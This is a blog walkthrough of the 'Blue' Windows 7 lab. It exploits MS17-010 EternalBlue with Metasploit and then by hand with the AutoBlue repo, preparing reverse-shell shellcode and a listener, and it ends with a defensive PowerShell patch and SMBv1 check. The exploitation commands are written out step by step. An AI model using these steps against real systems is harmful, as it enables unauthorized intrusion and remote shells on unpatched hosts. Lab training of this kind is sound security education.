DEV Community

Babs

Blue Windows 7 Walkthrough

Ever wondered how far you can push a machine before it breaks? This walkthrough explores unconventional methods to interact with the Blue machine.

The passwords for the machine are:

user - Password123!
admin - Password456!

The admin password is required to get the machine's IP address.

Log in as admin and run:

ipconfig

The output shows the machine's IP address. The image below shows mine.

On our Kali terminal we run ping to verify that the target is online and reachable from our Kali machine:

ping 192.168.59.133

NB - Change the IP address to your target's IP address.

The replies show that the machine is online, so we run an Nmap scan to discover which ports are open:

nmap -p- -A 192.168.59.133

(-p- scans all 65535 TCP ports, and -A adds OS detection, version detection, default scripts and traceroute.)

From the scan output, port 445 (SMB) is open, and the highlighted part shows the host is Windows 7 Ultimate 7601 Service Pack 1. SMB on this build is known to be vulnerable, so we do a Google search for "Windows 7 Ultimate 7601 Service Pack 1 exploit".

After some research, the well-known exploit for this version of Windows 7 turns out to be MS17-010, "EternalBlue".

So we start Metasploit with:

msfconsole

And then we run:

search eternalblue

You can also try:

search MS17-010

We first need to confirm that the machine is vulnerable to the exploit. There are two ways to do this: the auxiliary scanner module, or the exploit module's own check command.

Using the auxiliary scanner:
In the search results, the scanner to use is "auxiliary/scanner/smb/smb_ms17_010", which is number 24 for me (yours might be different).

So input:

use 24

NB - Use whatever number your search results show.

To view the module's options, input:

options

Now set rhosts to your target IP address:

set rhosts 192.168.59.133

Input options again to confirm the change:

options
Now input:

run

The scanner reports that the host is likely vulnerable to MS17-010.

Now we search for the exploit again:

search eternalblue

The module we want is "exploit/windows/smb/ms17_010_eternalblue", which for me is option 0, so input:

use 0

And then input:

options
Now we set rhosts to the target's IP address:

set rhosts 192.168.59.133

and run options again to confirm the change:

options

Now input:

check

The output shows that the target is vulnerable. (This is the second way to check whether the machine is vulnerable to the exploit.)

Now, to run the exploit, input:

run

OR

exploit

depending on how cool you want to feel (wink).

THE MACHINE HAS BEEN SUCCESSFULLY EXPLOITED.

MANUAL EXPLOITATION

We start by searching for "eternalblue github", because the exploit I want to use is on GitHub. From the search results, choose the one from the 3ndG4me GitHub account.

Now, on Kali, move into the /opt/ folder:

cd /opt/

NB - The /opt folder in Kali Linux is for optional add-on software packages, that is, software that isn't part of the core Kali system.

On the GitHub page, click on Code and copy the HTTPS link.

Now input:

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git

NB - For this step make sure you are the root user, or you will get the error seen below (a normal user cannot write into /opt).

Switch to root using:

sudo su root

and enter your password if prompted.

Now re-run the command:

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git

The command now succeeds and an AutoBlue-MS17-010 directory has been created.

Move into the AutoBlue directory:

cd AutoBlue-MS17-010/

Install the Python dependencies:

pip install -r requirements.txt
Move into the shellcode directory:

cd shellcode

and then run the shell prep script:

./shell_prep.sh

Enter y at the prompt.
Then enter your Kali IP address (that is your local host, known as LHOST).
Enter a port number you know is free for the x64 payload; I'm using 9999.
And enter another port number for the x86 payload; I'm using 2222.
For the shell I want a regular cmd shell, because I already used a Meterpreter shell for the msfconsole exploit. Either one will work, but I'm using cmd.

So input:

1

And for the payload, input:

0

to select the staged payload. (Either the staged or the stageless payload should work, but I'm using the staged one.)

Now that this is done, we need to go back up one directory and start the listener:

cd ..

Now input:

./listener_prep.sh

NB - This script starts a Metasploit listener (handler) for us.

Now fill in the same details as before: the same LHOST, the same ports, regular cmd shell and staged payload. The listener must match the settings used for the shellcode, or the connection back will not be caught.

Now all that's left is to run the exploit. Leave the listener running and open a new terminal tab (File, then New Tab).

In the new tab, switch to root, move into /opt/ and then cd into the AutoBlue-MS17-010 directory.

Now, run:

python eternalblue_exploit7.py 192.168.59.133 shellcode/sc_all.bin

NB - Change the IP address to your Blue machine's IP address.

The image below shows the Blue machine before running the exploit:

The image below shows the Blue machine after running the exploit:

The image below shows Kali's output:

The exploit succeeded but also ended up crashing the target.

This is a perfect example of why, when running a penetration test, you need to keep the client informed before running an exploit: an exploit like this one, which corrupts kernel memory, can take down an important machine that is still in use.
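The two vulnerability checks used above (the auxiliary scanner and the exploit module's check command) probe the host over the network. As an added example that is not part of the original walkthrough or the AutoBlue project, the PowerShell script below does the defender's version of the same check on the Windows 7 host itself: it looks for the MS17-010 updates and the SMBv1 server registry setting, and can disable SMBv1. It assumes an elevated PowerShell session on Windows 7 SP1 and that KB4012212 / KB4012215 are the March 2017 MS17-010 packages for that version.

```powershell
# Host-side MS17-010 exposure audit for Windows 7 SP1 (added example, not code
# from the walkthrough or from AutoBlue). Run from an elevated PowerShell:
#   .\Check-MS17010.ps1             (audit only)
#   .\Check-MS17010.ps1 -Remediate  (also turn off the SMBv1 server; reboot needed)
param([switch]$Remediate)

# Assumption: the March 2017 MS17-010 packages for Windows 7 SP1 / Server 2008 R2
# (security-only update and monthly rollup). Later monthly rollups also carry the
# fix, so "not found" means "check further", not "definitely vulnerable".
$ms17010Kbs = @('KB4012212', 'KB4012215')
$smbParams  = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Test-MS17010Patch {
    $found = Get-HotFix | Where-Object { $ms17010Kbs -contains $_.HotFixID }
    if ($found) {
        $ids = ($found | ForEach-Object { $_.HotFixID }) -join ', '
        Write-Host "MS17-010 fix present: $ids"
        return $true
    }
    Write-Host "No MS17-010 package found; verify that a newer rollup is installed."
    return $false
}

function Test-Smb1Enabled {
    # On Windows 7 the SMBv1 server is on unless this value is explicitly 0.
    $value = (Get-ItemProperty -Path $smbParams -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    if ($null -eq $value -or $value -ne 0) {
        Write-Host "SMBv1 server is ENABLED (default); this is the service EternalBlue targets."
        return $true
    }
    Write-Host "SMBv1 server is disabled."
    return $false
}

$patched = Test-MS17010Patch
$smb1On  = Test-Smb1Enabled

if ($smb1On -and $Remediate) {
    # SMB1=0 turns the SMBv1 server off after a reboot. Confirm first that nothing
    # on the network still needs SMBv1 (old NAS boxes, printers, scanners).
    New-ItemProperty -Path $smbParams -Name SMB1 -PropertyType DWORD -Value 0 -Force | Out-Null
    Write-Host "SMB1 registry value set to 0; reboot to apply."
}

if (-not $patched -and $smb1On) {
    Write-Host "RESULT: host is exposed to MS17-010 on port 445 until patched."
}
```

Disabling SMBv1 removes the vulnerable code path even on an unpatched host, but installing the update is still required, since later SMB fixes ship in the same rollups.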

SOME CHALLENGES YOU MIGHT FACE WHEN DOING THIS LAB EXPERIMENT

If your machine ends up looking like it did in the image above, you will need to delete it and reinstall it.
Once you've done that, log in with the administrator password, get your IP address, then log out and stay on the login page as seen below:

If the machine's login screen changes from its normal blue background to a black one, you will need to uninstall and reinstall the machine.

A blue background like this means the machine is alive and will communicate properly with your Kali box.

A black background like this indicates something has gone wrong, so reinstall the machine.

GOOD LUCK!
